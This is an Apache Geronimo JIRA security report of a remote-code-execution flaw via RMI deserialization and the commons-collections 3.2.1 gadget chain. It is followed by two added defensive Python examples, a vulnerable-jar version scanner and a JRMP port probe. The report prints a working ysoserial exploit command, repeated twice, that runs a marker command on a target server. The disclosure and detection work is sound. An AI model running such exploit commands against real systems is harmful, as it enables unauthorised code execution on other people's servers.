sevck created GERONIMO-6596:
-------------------------------

             Summary: Apache Geronimo Remote Code Execution Vulnerability
                 Key: GERONIMO-6596
                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
             Project: Geronimo
          Issue Type: Bug
      Security Level: public (Regular issues)
          Components: dependencies, security
    Affects Versions: 3.0.1
         Environment: linux,windows
            Reporter: sevck
            Priority: Critical


Unsupported old Geronimo versions may also be affected.

Description:
Apache Geronimo enables the Java RMI port 1099 by default and binds it to 
0.0.0.0 by default. In bash, I used the "grep -R InvokerTransformer" command 
and found that it uses commons-collections-3.2.1.jar by default.

[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches

This looks like Java deserialization is taken for granted. But when I used the 
ysoserial tool with the CommonsCollections1 payload, the response was:
java.lang.ClassNotFoundException: 
org.apache.commons.collections.map.TransformedMap (no security manager: RMI 
class loader disabled)
This seems to be a classpath error. In the Java 7u21 changelog:
-------------------------------------
Changes to RMI
From this release, the RMI property java.rmi.server.useCodebaseOnly is set to 
true by default. In previous releases the default value was false.

This change of default value may cause RMI-based applications to break 
unexpectedly. The typical symptom is a stack trace that contains a 
java.rmi.UnmarshalException containing a nested 
java.lang.ClassNotFoundException.

For more information, see RMI Enhancements.
---------------------------------------
So, run the application with 7u21.
Attack the server: 
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"


Mitigation:
Commons-collections 3.2.1 users should upgrade to 3.2.2.
The port should not be publicly accessible.
Exploit:
(precondition: the server runs JRE version 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by jianan.huang, researcher at QingTeng Cloud 
Security of Minded Security.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
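The report finds the gadget class by grepping the Geronimo install for InvokerTransformer, but that class is still present in commons-collections 3.2.2 (the 3.2.2 fix disables deserialization of the unsafe functors by default rather than removing them), so a check for the mitigation has to compare the jar version, not just look for the class. The following is an added example, not code from the reporter or from the Geronimo project: it walks a directory tree such as Geronimo's repository/, opens each jar, and flags any commons-collections 3.x jar that contains the gadget class and whose version is below 3.2.2. The two jars that demo() builds in a temporary directory are constructed fixtures, and the function names (scan_jars, jar_version, make_sample_tree, demo) are this example's own.

```python
"""Scan a directory tree for commons-collections 3.x jars that predate the
3.2.2 fix (InvokerTransformer & co. deserializable by default).

Added example; not part of Apache Geronimo or the original bug report."""
import os
import re
import tempfile
import zipfile

# Gadget class used by ysoserial's CommonsCollections1 chain. Only the 3.x
# package is checked; commons-collections4 lives under .../collections4/.
GADGET_CLASS = "org/apache/commons/collections/functors/InvokerTransformer.class"
# Maven metadata embedded in the jar; the most reliable version source.
POM_PROPS = "META-INF/maven/commons-collections/commons-collections/pom.properties"
FIXED_VERSION = (3, 2, 2)


def parse_version(text):
    """'3.2.1' -> (3, 2, 1); missing components are padded with 0."""
    nums = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def jar_version(zf, path):
    """Version from pom.properties, falling back to the file name; None if unknown."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        if m:
            return m.group(1).strip()
    except KeyError:
        pass  # no Maven metadata in this jar
    m = re.search(r"commons-collections-([\d.]+)\.jar$", os.path.basename(path))
    return m.group(1) if m else None


def scan_jars(root):
    """Return findings for every jar under root that ships the gadget class.

    A jar whose version cannot be determined is reported as vulnerable,
    since the gadget class is present and the fix cannot be confirmed."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as zf:
                    if GADGET_CLASS not in zf.namelist():
                        continue
                    version = jar_version(zf, path)
            except zipfile.BadZipFile:
                continue  # not a real jar; skip
            vulnerable = version is None or parse_version(version) < FIXED_VERSION
            findings.append({"path": path, "version": version, "vulnerable": vulnerable})
    findings.sort(key=lambda f: f["path"])
    return findings


def make_sample_tree(base):
    """Constructed fixture: two minimal jars in the Geronimo repository layout,
    both containing the gadget class, one at 3.2.1 and one at 3.2.2."""
    for ver in ("3.2.1", "3.2.2"):
        rel = f"repository/commons-collections/commons-collections/{ver}/commons-collections-{ver}.jar"
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr(GADGET_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
            zf.writestr(POM_PROPS, f"version={ver}\ngroupId=commons-collections\n")
    return base


def demo():
    """Build the fixture in a temp dir and scan it."""
    base = tempfile.mkdtemp(prefix="geronimo-scan-")
    make_sample_tree(base)
    return scan_jars(base)


if __name__ == "__main__":
    for f in demo():
        print("VULNERABLE" if f["vulnerable"] else "ok        ", f["version"], f["path"])
```

Point it at a real install with scan_jars("/path/to/geronimo-tomcat7-javaee6-3.0.1"); the version check is what distinguishes a patched 3.2.2 from the shipped 3.2.1, which a plain grep for the class name cannot do.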

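The other half of the report is exposure: the registry is bound to 0.0.0.0 on 1099, and the mitigation is to keep that port off public networks. The following is an added example, not code from the reporter or the Geronimo project, for verifying from a given network position whether a port answers as a Java RMI endpoint. It sends the JRMP stream-protocol handshake (the "JRMI" magic, version 2, protocol byte 0x4b) and treats a ProtocolAck (0x4e) followed by the server's view of the client's host and port as a positive. The fake listener it starts on 127.0.0.1 is a constructed stand-in for an RMI registry so the probe can be exercised offline; the function names jrmp_probe and start_fake_endpoint are this example's own. A positive result shows only that an RMI endpoint is reachable; whether a gadget chain such as commons-collections is on its classpath is a separate check.

```python
"""Probe a TCP port for a Java RMI (JRMP) endpoint via the stream-protocol
handshake, plus a constructed fake endpoint for offline testing.

Added example; not part of Apache Geronimo or the original bug report."""
import socket
import struct
import threading

JRMI_MAGIC = b"JRMI"     # 0x4a 0x52 0x4d 0x49
JRMP_VERSION = 2
STREAM_PROTOCOL = 0x4B   # client header: StreamProtocol
PROTOCOL_ACK = 0x4E      # server reply: ProtocolAck


def _recv_exact(sock, n):
    """Read exactly n bytes or raise ConnectionError on early close."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def jrmp_probe(host, port, timeout=3.0):
    """Return (True, seen_host, seen_port) if host:port completes the JRMP
    handshake, else (False, None, None). seen_host/seen_port are the client
    address as echoed by the server after ProtocolAck."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(JRMI_MAGIC + struct.pack(">HB", JRMP_VERSION, STREAM_PROTOCOL))
            if _recv_exact(s, 1) != bytes([PROTOCOL_ACK]):
                return (False, None, None)
            # After ProtocolAck the server writes the client's host as a
            # modified-UTF string (2-byte length prefix) and its port as an int.
            (hlen,) = struct.unpack(">H", _recv_exact(s, 2))
            seen_host = _recv_exact(s, hlen).decode("utf-8", "replace")
            (seen_port,) = struct.unpack(">i", _recv_exact(s, 4))
            return (True, seen_host, seen_port)
    except OSError:  # includes ConnectionError and socket.timeout
        return (False, None, None)


def start_fake_endpoint(answer_jrmp=True):
    """Constructed local listener: replies to the JRMP handshake the way an RMI
    registry does, or with a non-JRMP banner when answer_jrmp is False.
    Serves one connection and returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, (chost, cport) = srv.accept()
        with conn:
            try:
                hdr = _recv_exact(conn, 7)  # magic(4) + version(2) + protocol(1)
                if answer_jrmp and hdr[:4] == JRMI_MAGIC and hdr[6] == STREAM_PROTOCOL:
                    h = chost.encode("utf-8")
                    conn.sendall(bytes([PROTOCOL_ACK]) + struct.pack(">H", len(h)) + h
                                 + struct.pack(">i", cport))
                else:
                    conn.sendall(b"HTTP/1.0 400 Bad Request\r\n\r\n")
            except OSError:
                pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    p = start_fake_endpoint()
    print(jrmp_probe("127.0.0.1", p))
```

Run jrmp_probe against the Geronimo host from outside the trusted network segment; an answer there means the 1099 listener is exposed regardless of which commons-collections version is installed.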